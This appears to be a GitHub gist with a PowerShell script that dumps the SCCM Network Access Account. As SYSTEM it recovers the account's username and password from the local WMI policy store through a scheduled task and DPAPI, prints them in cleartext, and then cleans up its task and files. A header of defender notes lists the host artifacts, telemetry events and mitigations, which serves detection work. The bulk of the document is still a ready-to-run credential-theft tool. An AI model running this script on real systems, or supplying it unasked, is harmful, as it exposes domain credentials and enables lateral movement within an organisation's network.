@Mayyhem
Last active January 2, 2026 15:52
sccm_dump_naa_powershell
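# -----------------------------------------------------------------------------
# What this script does
#   On a host with the Configuration Manager client installed, it writes a
#   helper script to disk, runs it once as SYSTEM through a scheduled task,
#   prints the helper's output, then removes the task and both files.
#   The helper reads the CCM_NetworkAccessAccount instances from
#   root\ccm\policy\machine\actualconfig and DPAPI-unprotects the stored
#   NetworkAccessUserName / NetworkAccessPassword values.
#   Registering a task that runs as SYSTEM requires local administrator rights.
#
# Defender notes
#   * Exposure shown: code running as SYSTEM on a client can recover the
#     Network Access Account in cleartext. Keep that account limited to what
#     content access needs, and where the site supports it prefer Enhanced
#     HTTP so that no NAA secret is delivered to clients.
#   * Host artifacts created below: scheduled task "SCCM_Decrypt_NAA" with a
#     SYSTEM principal; cmd.exe launching
#     "powershell.exe -NoProfile -ExecutionPolicy Bypass -File ..."; the files
#     Decrypt-NAA.ps1 and Decrypt-NAA.out under C:\Windows\Temp.
#   * Telemetry that records them when enabled: Security events 4698 / 4699
#     (scheduled task created / deleted), the TaskScheduler/Operational log,
#     process-creation auditing with command lines, and PowerShell script
#     block logging (4104) for the helper's body.
#   * NOTE(review): the helper's path is a predictable name in a shared temp
#     directory and the file is executed as SYSTEM; a directory writable only
#     by Administrators/SYSTEM would be the safer location. The output file
#     holds cleartext credentials until cleanup succeeds.
# -----------------------------------------------------------------------------

# -----------------------------
# Paths and task name
# -----------------------------
$BaseDir    = "C:\Windows\Temp"
$ScriptPath = Join-Path $BaseDir "Decrypt-NAA.ps1"
$OutputPath = Join-Path $BaseDir "Decrypt-NAA.out"
$TaskName   = "SCCM_Decrypt_NAA"

# Everything that creates state (files, task) sits inside try so the finally
# block removes the SYSTEM task and the cleartext output even when a step
# throws or the run is interrupted.
try {
    # -----------------------------
    # Write decrypt script to disk
    # (here-string body is written verbatim; the closing marker must stay at
    # column 0)
    # -----------------------------
    @'
# Credit: Tom Degreef and Kim Oppalfens
# Ensure DPAPI types are available (REQUIRED under SYSTEM)
Add-Type -AssemblyName System.Security
$SCCMSecret = Get-CimInstance `
-ClassName CCM_NetworkAccessAccount `
-Namespace root\ccm\policy\machine\actualconfig
foreach ($secret in $SCCMSecret) {
# -------- Username --------
$EncodedString = $secret.NetworkAccessUserName.Split('[')[2].Split(']')[0]
$Array = New-Object Byte[] ($EncodedString.Length / 2)
for ($i = 0; $i -lt ($EncodedString.Length / 2 - 4); $i++) {
$Array[$i] = [Convert]::ToByte(
$EncodedString.Substring(($i + 4) * 2, 2), 16
)
}
$User = [System.Text.Encoding]::Unicode.GetString(
[System.Security.Cryptography.ProtectedData]::Unprotect(
$Array,
$null,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser
)
)
Write-Output "Decrypted NetworkAccess Account Username = $User"
# -------- Password --------
$EncodedString = $secret.NetworkAccessPassword.Split('[')[2].Split(']')[0]
$Array = New-Object Byte[] ($EncodedString.Length / 2)
for ($i = 0; $i -lt ($EncodedString.Length / 2 - 4); $i++) {
$Array[$i] = [Convert]::ToByte(
$EncodedString.Substring(($i + 4) * 2, 2), 16
)
}
$Password = [System.Text.Encoding]::Unicode.GetString(
[System.Security.Cryptography.ProtectedData]::Unprotect(
$Array,
$null,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser
)
)
Write-Output "Decrypted NetworkAccess Account Password = $Password"
}
'@ | Set-Content -Encoding UTF8 -Path $ScriptPath

    # -----------------------------
    # Scheduled task action
    # (cmd.exe required for redirection)
    # -----------------------------
    $Action = New-ScheduledTaskAction `
        -Execute "cmd.exe" `
        -Argument "/c powershell.exe -NoProfile -ExecutionPolicy Bypass -File `"$ScriptPath`" > `"$OutputPath`" 2>&1"

    $Principal = New-ScheduledTaskPrincipal `
        -UserId "SYSTEM" `
        -LogonType ServiceAccount `
        -RunLevel Highest

    Register-ScheduledTask `
        -TaskName $TaskName `
        -Action $Action `
        -Principal $Principal `
        -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date)) `
        -Force

    # -----------------------------
    # Run task
    # -----------------------------
    Start-ScheduledTask -TaskName $TaskName

    # -----------------------------
    # Wait for completion
    # -----------------------------
    # State is a property of the task object returned by Get-ScheduledTask.
    # The Get-ScheduledTaskInfo object has no State property, so polling it
    # yields $null and the loop ends after one sleep; cleanup could then run
    # while cmd.exe still holds the output file open, and the silenced
    # Remove-Item would leave cleartext credentials on disk.
    do {
        Start-Sleep -Milliseconds 500
        $State = (Get-ScheduledTask -TaskName $TaskName).State
    } while (($State -eq 'Queued') -or ($State -eq 'Running'))

    # -----------------------------
    # Display output
    # -----------------------------
    if (Test-Path $OutputPath) {
        Get-Content $OutputPath
    } else {
        Write-Host "Output file not found."
    }
}
finally {
    # -----------------------------
    # Cleanup
    # -----------------------------
    Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
    Remove-Item -Path $ScriptPath, $OutputPath -Force -ErrorAction SilentlyContinue

    # Remove-Item errors are silenced above, so check explicitly that no
    # credential material or helper script was left behind.
    foreach ($Leftover in @($ScriptPath, $OutputPath)) {
        if (Test-Path $Leftover) {
            Write-Warning "Cleanup incomplete, file still present: $Leftover"
        }
    }
}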